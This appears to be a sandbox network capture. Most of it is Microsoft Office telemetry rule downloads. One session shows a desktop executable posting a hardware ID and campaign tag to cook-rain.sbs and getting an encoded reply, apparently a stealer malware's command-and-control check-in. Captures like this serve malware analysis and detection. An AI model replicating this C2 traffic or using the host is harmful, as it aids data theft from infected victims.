                                                                                                                                                                                                2024-11-20 09:54:32 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                100192.168.2.74980313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:32 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:32 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1368
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                x-ms-request-id: df1e4bb0-c01e-0034-6f8a-3a2af6000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095432Z-185f5d8b95csp6jmhC1NYCwy6s00000009yg00000000d1wn
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:32 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                101192.168.2.74980413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:32 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:32 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1401
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095432Z-1777c6cb754n67brhC1TEBcp9c00000009d000000000er5w
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:32 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                102192.168.2.749806188.114.96.34437724C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:32 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 88
                                                                                                                                                                                                Host: cook-rain.sbs
                                                                                                                                                                                                2024-11-20 09:54:32 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 33 32 38 30 39 43 45 31 42 39 38 30 35 44 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38
                                                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=32809CE1B9805DCB63CFCF7E6C45F838
                                                                                                                                                                                                2024-11-20 09:54:33 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:33 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=pgahpcutpf71m911iv6ae1ld9a; expires=Sun, 16-Mar-2025 03:41:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vo2%2B%2ByV%2BQUh2zeKotYU73pqEWOQiaaZskgvuM%2BnnUSErXx7sQXwpofZMpHWWPyGAE00PJIh5h6OH6XsiOFGRQQLby7vlVhiopDDVQiaPDnbmGyjnH1aIWPmn5IYG67rn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e578f2bfc3e5e6d-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1583&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=985&delivery_rate=1808049&cwnd=252&unsent_bytes=0&cid=af1f73e0a3abb537&ts=278&x=0"
                                                                                                                                                                                                2024-11-20 09:54:33 UTC214INData Raw: 64 30 0d 0a 6d 72 6f 6b 58 77 51 4f 6c 63 76 4b 57 73 51 36 6f 48 6e 36 45 44 72 37 30 75 48 75 49 39 65 69 32 49 37 75 4c 35 67 4f 64 50 44 42 77 51 59 71 4a 6a 53 33 6f 37 34 75 74 41 44 38 56 71 59 2f 43 38 50 6e 7a 39 77 53 34 6f 7a 70 76 39 30 42 71 54 67 6f 33 2f 58 63 51 67 4d 72 61 76 43 74 35 44 2b 38 58 34 4a 56 32 48 5a 4f 32 65 6a 52 77 67 47 79 67 4f 4b 2f 6b 77 50 6a 4c 41 48 53 6f 4a 68 4d 4b 33 42 2b 72 35 66 6c 42 75 73 4c 6d 45 7a 55 49 67 76 4f 2f 4e 44 66 45 50 6d 54 37 74 4c 42 58 4f 78 72 46 5a 33 47 6c 56 59 2b 61 6d 72 36 70 75 51 2f 76 46 2b 43 56 64 68 32 54 74 6e 6f 30 63 49 42 73 6f 44 69 76 35 4e 79 0d 0a
                                                                                                                                                                                                Data Ascii: d0mrokXwQOlcvKWsQ6oHn6EDr70uHuI9ei2I7uL5gOdPDBwQYqJjS3o74utAD8VqY/C8Pnz9wS4ozpv90BqTgo3/XcQgMravCt5D+8X4JV2HZO2ejRwgGygOK/kwPjLAHSoJhMK3B+r5flBusLmEzUIgvO/NDfEPmT7tLBXOxrFZ3GlVY+amr6puQ/vF+CVdh2Ttno0cIBsoDiv5Ny
                                                                                                                                                                                                2024-11-20 09:54:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                103192.168.2.74980513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:32 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:33 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:33 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1364
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                x-ms-request-id: b432c83f-b01e-0021-141b-3bcab7000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095433Z-r1d97b99577gg97qhC1TEBcrf400000008k00000000057qk
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:33 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                104192.168.2.74980813.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:33 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:33 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:33 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1360
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095433Z-1777c6cb754j47wfhC1TEB5wrw000000057000000000b6df
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:33 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                105192.168.2.74980713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:33 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:33 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:33 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1397
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                x-ms-request-id: ce1429b8-d01e-005a-2df1-3a7fd9000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095433Z-185f5d8b95c4vwv8hC1NYCy4v40000000a3g00000000fk8s
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:33 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                106192.168.2.74981013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:33 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:33 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:33 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1366
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                x-ms-request-id: e2992625-501e-005b-678c-3ad7f7000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095433Z-185f5d8b95crl6swhC1NYC3ueg0000000a5000000000br3b
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:33 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                107192.168.2.74980913.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:33 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:33 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:33 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1403
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095433Z-185f5d8b95cqnkdjhC1NYCm8w800000009tg00000000kbqy
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:33 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                108192.168.2.74981113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:33 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:33 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:33 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1397
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                x-ms-request-id: 87dd4cea-901e-00ac-60f9-3ab69e000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095433Z-r1d97b99577sdxndhC1TEBec5n00000008s000000000ax4y
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
